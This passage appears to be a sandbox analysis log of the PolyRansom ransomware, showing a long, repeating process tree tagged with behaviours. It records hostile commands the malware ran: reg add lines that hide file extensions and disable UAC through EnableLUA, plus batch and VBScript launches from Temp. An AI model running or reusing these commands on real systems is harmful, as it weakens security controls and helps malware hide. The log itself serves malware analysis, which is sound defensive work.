        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pIIscAQM.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        53⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        54⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        51⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        51⤵
        
        PID:5752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        51⤵
        UAC bypass
        
        PID:8108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZogIcIsM.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        51⤵
        System Location Discovery: System Language Discovery
        
        PID:5316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        52⤵
        System Location Discovery: System Language Discovery
        
        PID:6612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        49⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:8104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        50⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        49⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        49⤵
        UAC bypass
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eecAEMEM.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        49⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        50⤵
        
        PID:7260
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        47⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        47⤵
        Modifies registry key
        
        PID:6412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        47⤵
        UAC bypass
        Modifies registry key
        
        PID:6660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EwwYksAs.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        47⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        48⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        45⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:7028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        45⤵
        UAC bypass
        
        PID:7496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HussIEsI.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        45⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        46⤵
        
        PID:6828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        43⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        43⤵
        Modifies registry key
        
        PID:6332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        43⤵
        UAC bypass
        
        PID:5212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUAMAEMc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        43⤵
        
        PID:6316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        44⤵
        
        PID:7048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        41⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        41⤵
        
        PID:7536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        41⤵
        UAC bypass
        
        PID:2664
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RokcsIww.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        41⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        42⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        39⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        39⤵
        Modifies registry key
        
        PID:7316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        39⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BecAscMA.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:6920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:7308
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        40⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        37⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        37⤵
        
        PID:8020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        37⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7512
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gaockEkc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        37⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        38⤵
        
        PID:7480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        35⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        35⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        35⤵
        UAC bypass
        
        PID:4208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uuoUQsww.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        35⤵
        
        PID:8068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        36⤵
        
        PID:6976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        33⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6148
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:7272
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        33⤵
        Modifies registry key
        
        PID:6708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        33⤵
        UAC bypass
        Modifies registry key
        
        PID:6840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ySkowYMg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        33⤵
        System Location Discovery: System Language Discovery
        
        PID:7624
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        34⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        31⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        31⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        31⤵
        UAC bypass
        
        PID:6576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kuQQoAQk.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        31⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        32⤵
        System Location Discovery: System Language Discovery
        
        PID:8000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        29⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:6632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        29⤵
        System Location Discovery: System Language Discovery
        
        PID:4504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        29⤵
        UAC bypass
        Modifies registry key
        
        PID:7376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIockMwQ.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        29⤵
        
        PID:6208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        30⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:8024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        UAC bypass
        
        PID:2272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oeIoQsQs.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        27⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        
        PID:7308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        UAC bypass
        
        PID:6528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BuEcYAcU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        25⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:5760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:8080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:8040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        UAC bypass
        
        PID:8016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FwMcMEEE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:7892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        24⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        UAC bypass
        
        PID:6684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rGIQMswg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        21⤵
        
        PID:7580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:2744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        
        PID:7476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ByQQMsso.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        19⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:6832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        
        PID:6612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsoUwsIo.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        17⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qGMYooUw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        15⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        
        PID:8144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        
        PID:8152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        Modifies registry key
        
        PID:7552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hSEgIkcc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        13⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:6616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:7668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EgkEgwUc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        11⤵
        
        PID:7204
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        Modifies registry key
        
        PID:5192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        
        PID:236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iIAUIcok.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        9⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:6868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUkoYcgI.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        7⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:5272
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7216
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:5624
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        
        PID:5732
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yMoMQUMg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        5⤵
        
        PID:7152
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:6612
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:396
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:6192
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:6396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIUskkkk.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6636
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:5492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3032

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004B8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1732

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004B8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
